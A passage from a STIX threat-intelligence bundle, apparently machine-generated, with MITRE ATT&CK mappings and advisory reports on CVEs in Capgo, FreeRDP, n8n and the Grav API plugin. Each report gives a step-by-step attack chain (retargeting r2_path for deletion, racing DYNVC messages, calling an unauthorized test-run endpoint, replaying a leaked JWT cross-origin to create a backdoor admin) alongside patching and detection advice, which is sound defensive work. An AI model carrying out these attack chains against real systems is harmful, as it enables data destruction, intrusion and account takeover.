      "pattern": "[url:value = 'https://github.com/Cap-go/capgo/security/advisories/GHSA-pw8p-5jg6-cxj3']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:22:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4751943c-f4b1-506c-9115-51d61497ce22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--213daf6a-5e6a-5005-b267-975996933ee4",
      "target_ref": "indicator--717fbd6b-6aa3-53ab-b854-4ae0cd857d0f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2ec1b260-ebfd-5486-afd4-a9c8b3880c45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/capgo-arbitrary-r2-object-deletion-via-mutable-r2-path-in-app-versions",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/capgo-arbitrary-r2-object-deletion-via-mutable-r2-path-in-app-versions']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:22:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d664edb-3420-53b1-b5f4-72d94c968f00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--213daf6a-5e6a-5005-b267-975996933ee4",
      "target_ref": "indicator--2ec1b260-ebfd-5486-afd4-a9c8b3880c45"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3f859f2-7974-53cb-b3e2-8c56b87c4c57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--213daf6a-5e6a-5005-b267-975996933ee4",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Access Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1531",
          "url": "https://attack.mitre.org/techniques/T1531"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b60d80e0-80ba-5e16-808c-8248061da1f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--213daf6a-5e6a-5005-b267-975996933ee4",
      "target_ref": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--213daf6a-5e6a-5005-b267-975996933ee4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56250: Capgo R2 Bundle Object Deletion via Mutable r2_path",
      "description": "## Overview\n\nCapgo, an open-source tool for managing Capacitor applications, is affected by CVE-2026-56250, a high-severity vulnerability present in versions prior to 12.128.2. This flaw enables an attacker possessing an upload-scoped API key to modify the `app_versions.r2_path` field through the PostgREST interface. By exploiting this, the attacker can redirect the path of an application version they control to point to arbitrary R2 bundle objects belonging to a victim. Subsequently, by initiating a \"soft-delete\" operation on their modified version, the attacker can trigger an internal `on_version_update` cleanup function that then inadvertently deletes the victim's targeted R2 object. This results in a denial of service and significant disruption to bundle availability for applications managed by the vulnerable Capgo instance, severely impacting operational integrity.\n\n## Attack Chain\n\n1. Attacker obtains a valid upload-scoped API key for a Capgo instance, which provides legitimate access to interact with application versions.\n2. Attacker identifies a target application version within Capgo that they control and a victim's critical R2 bundle object they wish to delete.\n3. Attacker uses the upload-scoped API key to make a PATCH request via PostgREST, targeting the `app_versions.r2_path` field of their controlled application version.\n4. The `r2_path` field is modified to point from the attacker's own R2 bundle object to the specific victim R2 bundle object, effectively retargeting it.\n5. Attacker initiates an action (e.g., publishing a new version that makes the previous one obsolete) that leads to a \"soft-delete\" of their now-maliciously-configured application version.\n6. Capgo's backend executes the `on_version_update` cleanup function, which follows the attacker-modified `r2_path`.\n7. The cleanup function then erroneously attempts to \"clean up\" the R2 object at the retargeted path, resulting in the deletion of the victim's legitimate R2 bundle object.\n8. Victim's applications that rely on the deleted R2 bundle object experience service disruption and denial of service due to unavailability of necessary resources.\n\n## Impact\n\nThe observed impact of CVE-2026-56250 exploitation is a direct denial of service (DoS) affecting applications and services managed by Capgo deployments. Attackers can leverage this vulnerability to arbitrarily delete crucial R2 bundle objects, rendering legitimate applications inoperable or unavailable. This can lead to severe operational disruptions, loss of data integrity (due to missing bundles), and potential financial and reputational damage for affected organizations. The vulnerability specifically targets the availability of application bundles, which are fundamental to the functionality of Capgo-managed applications, affecting any organization using vulnerable Capgo versions.\n\n## Recommendation\n\n* Immediately update Capgo to version 12.128.2 or newer to remediate CVE-2026-56250.\n* Review and enforce strict access control policies for all Capgo API keys, ensuring that upload-scoped keys lack permissions to modify sensitive configuration paths like `app_versions.r2_path`.\n* Monitor Capgo application logs and PostgREST access logs for any unauthorized or unusual PATCH requests to the `app_versions.r2_path` field or unexpected deletion events in R2 storage.\n",
      "published": "2026-07-08T14:22:30Z",
      "labels": [
        "vulnerability",
        "denial-of-service",
        "cloud",
        "web-application"
      ],
      "object_refs": [
        "indicator--717fbd6b-6aa3-53ab-b854-4ae0cd857d0f",
        "indicator--2ec1b260-ebfd-5486-afd4-a9c8b3880c45",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56250"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-pw8p-5jg6-cxj3"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/capgo-arbitrary-r2-object-deletion-via-mutable-r2-path-in-app-versions"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e04550f7-0359-57cd-b3fb-9cf9b41a85c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08ba9be9-9524-506b-b496-1fc02e62a6a2",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48d989bd-9de6-5803-af25-9736da269d12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08ba9be9-9524-506b-b496-1fc02e62a6a2",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--08ba9be9-9524-506b-b496-1fc02e62a6a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56297 - FreeRDP Use-After-Free Vulnerability Leading to RCE/DoS",
      "description": "## Overview\n\nCVE-2026-56297 describes a critical use-after-free vulnerability affecting FreeRDP client versions prior to 3.22.0. This flaw, residing within the `dvcman_channel_close` and `dvcman_call_on_receive` functions, arises from improper synchronization of `channel_callback` access. An attacker can exploit this by operating a malicious RDP server, which sends specially crafted `DYNVC_DATA` and `DYNVC_CLOSE` messages concurrently. This race condition leads to a heap-use-after-free condition in the `drdynvc` client thread, potentially resulting in remote code execution (RCE) or a denial of service (DoS) on the connecting FreeRDP client. The vulnerability was published on July 8, 2026, and impacts users of the FreeRDP client library. Defenders should prioritize patching and be aware of malicious RDP servers targeting their FreeRDP-enabled endpoints.\n\n## Attack Chain\n\n1. The victim uses a FreeRDP client version prior to 3.22.0 to connect to a malicious RDP server.\n2. The malicious RDP server initiates dynamic virtual channel (DYNVC) communication with the client.\n3. The server crafts and sends `DYNVC_DATA` and `DYNVC_CLOSE` messages concurrently to the client.\n4. Due to improper synchronization within `dvcman_channel_close` and `dvcman_call_on_receive`, a race condition is triggered in the FreeRDP client's `drdynvc` thread.\n5. This race condition causes a heap-use-after-free error within the client's memory.\n6. The malicious RDP server can leverage this memory corruption to achieve remote code execution on the client, or simply cause the client application to crash, leading to a denial of service.\n\n## Impact\n\nA successful exploitation of CVE-2026-56297 can lead to severe consequences for organizations utilizing vulnerable FreeRDP clients. Attackers controlling a malicious RDP server could execute arbitrary code on the client machine, potentially leading to full system compromise, data exfiltration, or further network lateral movement. Alternatively, they could trigger a denial of service, rendering the FreeRDP client application unusable and disrupting user access to legitimate RDP sessions. While no specific victim counts or targeted sectors are mentioned, any organization whose users connect to untrusted RDP servers via affected FreeRDP clients is at risk.\n\n## Recommendation\n\n* Immediately upgrade all FreeRDP client installations to version 3.22.0 or later to patch CVE-2026-56297.\n* Implement strict policies and controls on which RDP servers users are permitted to connect to, especially when using FreeRDP clients.\n",
      "published": "2026-07-08T14:23:25Z",
      "labels": [
        "vulnerability",
        "RCE",
        "DoS",
        "FreeRDP",
        "client-side"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56297"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-3mv2-5q57-2v8h"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/freerdp-use-after-free-via-race-condition-in-drdynvc-channel-callback"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e231897-e761-5318-989b-d4f1157065aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6fa485a-5bb5-5855-9231-00942768c3c6",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a8703b7b-0d49-5c99-a54b-c8397fc881a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6fa485a-5bb5-5855-9231-00942768c3c6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d208d334-1962-5707-83d2-caf85c3a67da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6fa485a-5bb5-5855-9231-00942768c3c6",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f6fa485a-5bb5-5855-9231-00942768c3c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56776 - n8n Authorization Bypass via Workflow Test Run Endpoint",
      "description": "## Overview\n\nThe NVD has published details regarding CVE-2026-56776, an authorization bypass vulnerability affecting n8n workflow automation platform versions prior to 1.123.55, 2.25.7, and 2.26.2. This critical flaw allows an authenticated user, typically with `workflow:read` permissions, to trigger the execution of workflows that they are not authorized to run. The vulnerability lies within the `POST /workflows/{workflowId}/test-runs/new` API endpoint, which incorrectly validates authorization against `workflow:read` scope instead of `workflow:execute`. Exploitation results in unintended side effects, including outbound API calls, data mutations, and other actions within connected downstream systems, effectively elevating the attacker's privileges from read-only to full execution for a given workflow. This poses a significant risk to organizations using n8n with its Evaluations feature and RBAC, as it permits unauthorized data manipulation and external system interaction.\n\n## Attack Chain\n\n1. An attacker gains or already possesses valid credentials for an n8n instance, granting them authenticated access, specifically with `workflow:read` permissions to a target workflow.\n2. The attacker identifies a specific workflow (`workflowId`) they wish to execute but for which they lack the `workflow:execute` permission.\n3. The attacker crafts an HTTP POST request targeting the vulnerable endpoint: `/workflows/{workflowId}/test-runs/new`.\n4. The attacker sends this POST request to the n8n application.\n5. Due to an authorization bypass, the n8n application incorrectly validates the request using the `workflow:read` scope instead of the required `workflow:execute` scope.\n6. The n8n internal workflow runner is triggered, initiating a real evaluation test run of the specified workflow, despite the user lacking explicit execution privileges.\n7. The executed workflow performs its defined actions, which may include making unintended outbound API calls, modifying data in connected systems, or other unauthorized side effects.\n8. The attacker has effectively escalated privileges and achieved unauthorized execution of a workflow.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56776 can lead to significant unauthorized actions within an organization's ecosystem. An authenticated user, despite having only read-level permissions, can trigger sensitive workflows designed for automation, potentially causing unintended outbound API calls, deletion or modification of critical data in connected downstream systems (e.g., CRM, ERP, databases), or the triggering of other business logic. While no specific victim counts are available, any organization utilizing n8n with RBAC project roles and the Evaluations feature, where `workflow:read` is granted without `workflow:execute`, is at risk of unauthorized data manipulation and privilege escalation.\n\n## Recommendation\n\n* Patch affected n8n instances immediately to versions 1.123.55, 2.25.7, 2.26.2 or later to remediate CVE-2026-56776.\n* Deploy the provided Sigma rule \"Detects CVE-2026-56776 Exploitation - n8n Authorization Bypass\" to your SIEM and tune for your environment to identify attempts to exploit the `POST /workflows/{workflowId}/test-runs/new` endpoint.\n* Review your n8n Role-Based Access Control (RBAC) configurations, especially for instances using the Evaluations feature, to ensure that users with `workflow:read` permissions cannot unintentionally trigger workflow executions.\n* Ensure robust logging is enabled for your n8n web server to capture detailed HTTP request information (method, URI, and response status codes) which is critical for activating the detection rule.\n",
      "published": "2026-07-08T14:24:22Z",
      "labels": [
        "authorization-bypass",
        "n8n",
        "web-application",
        "vulnerability",
        "privilege-escalation"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56776"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db1fbd2d-5f03-53cb-aff1-84906cf6c132",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cdcdb56-d2bd-57ed-b831-740a1eff1023",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91ffd209-79f7-540c-88ed-c1aa0631155c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cdcdb56-d2bd-57ed-b831-740a1eff1023",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63395f43-3191-5dc7-8fee-418e7ec65af4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0cdcdb56-d2bd-57ed-b831-740a1eff1023",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0cdcdb56-d2bd-57ed-b831-740a1eff1023",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58656 - Grav API Plugin Cross-Origin Authentication Bypass and Account Takeover",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-58656, affects the Grav API plugin versions prior to v1.0.0-rc.16. This flaw enables unauthenticated attackers to bypass authentication and execute fully authenticated API requests from any malicious web domain. The core issue lies in the plugin's acceptance of JSON Web Tokens (JWT) directly via the `?token=` URL query parameter and its incorrect configuration of the `Access-Control-Allow-Origin: *` response header, which permits cross-origin requests. Attackers can obtain these sensitive JWT tokens through various means, including leaked access logs, proxy logs, browser history, or Referrer headers. Successful exploitation allows for the creation of persistent backdoor super-admin accounts, granting full control over the Grav instance, and facilitating the exfiltration of sensitive configuration and user data, posing a severe risk to data integrity and confidentiality for affected Grav installations.\n\n## Attack Chain\n\n1. **Token Leakage:** An attacker obtains a valid JWT token through passive reconnaissance, such as scraping public access logs, exploiting proxy log misconfigurations, or analyzing browser history and Referrer headers that inadvertently expose the `?token=` parameter.\n2. **Malicious Website Setup:** The attacker sets up a malicious website or leverages an existing compromised site to host their exploit code.\n3. **Cross-Origin Request Initiation:** From the malicious website, the attacker crafts and initiates a JavaScript-based cross-origin API request targeting the vulnerable Grav instance.\n4. **JWT Injection:** The attacker embeds the leaked JWT token directly into the URL query string of the API request, using the format `/api/endpoint?token=JWT_VALUE`.\n5. **Vulnerable Processing:** The Grav API plugin, due to the `Access-Control-Allow-Origin: *` header, processes this cross-origin request as fully authenticated and ignores origin restrictions.\n6. **Admin Account Creation:** The attacker sends an authenticated API request to create a new, persistent super-admin account, establishing a backdoor.\n7. **Data Exfiltration:** Using the newly created super-admin account or directly via the compromised JWT, the attacker sends subsequent API requests to exfiltrate sensitive configuration files and user database contents.\n\n## Impact\n\nThe successful exploitation of CVE-2026-58656 leads to severe consequences, primarily affecting the confidentiality, integrity, and availability of Grav installations. Attackers can gain complete administrative control over the Grav content management system by creating persistent backdoor super-admin accounts. This level of access allows for arbitrary data modification, content defacement, or complete deletion. Furthermore, attackers can exfiltrate sensitive data, including but not limited to user credentials, personal identifiable information (PII), and proprietary configuration settings. This can result in significant data breaches, reputational damage, and potential regulatory non-compliance for affected organizations.\n\n## Recommendation\n\n* **Patch CVE-2026-58656 immediately** by upgrading the Grav API plugin to version v1.0.0-rc.16 or later to remove the vulnerable functionality.\n* **Deploy the Sigma rules in this brief** to your SIEM to detect attempts to exploit the `?token=` query parameter.\n* **Review web server logs and proxy logs** for instances of `/api/*?token=` query parameters to identify potential historical exploitation or token leakage.\n",
      "published": "2026-07-08T14:25:22Z",
      "labels": [
        "grav",
        "api-plugin",
        "jwt",
        "cors",
        "remote-code-execution",
        "web-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58656"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-hqm9-5xxw-4qxp"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/grav-api-plugin-cross-origin-admin-account-takeover-via-cors-wildcard-and-jwt-query-parameter"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33f8f4d2-6e5d-5ea1-b0fd-4fa20bcc7889",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--090354e4-4cfc-55d6-b8e7-9428ecf15f46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c87b4318-a076-55b3-89b6-e043e1438e1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b92a1e2c-c0f6-5f5a-8efd-40fcc4dbf343",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e2488f8-d66a-516a-ac54-c627e6a04e63",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Password Stores",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2c48304a-fe32-548f-b707-f9940b16808a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Clipboard Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1115",
          "url": "https://attack.mitre.org/techniques/T1115"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50421c1f-f7fa-5994-8ac9-88e60032d661",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a69b4c6b-e291-51d4-a0cf-bb37e22654d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d2c912c-2d40-58d6-81af-f837bfcc2f20",
      "created": "2026-07-09T17:20:22Z",
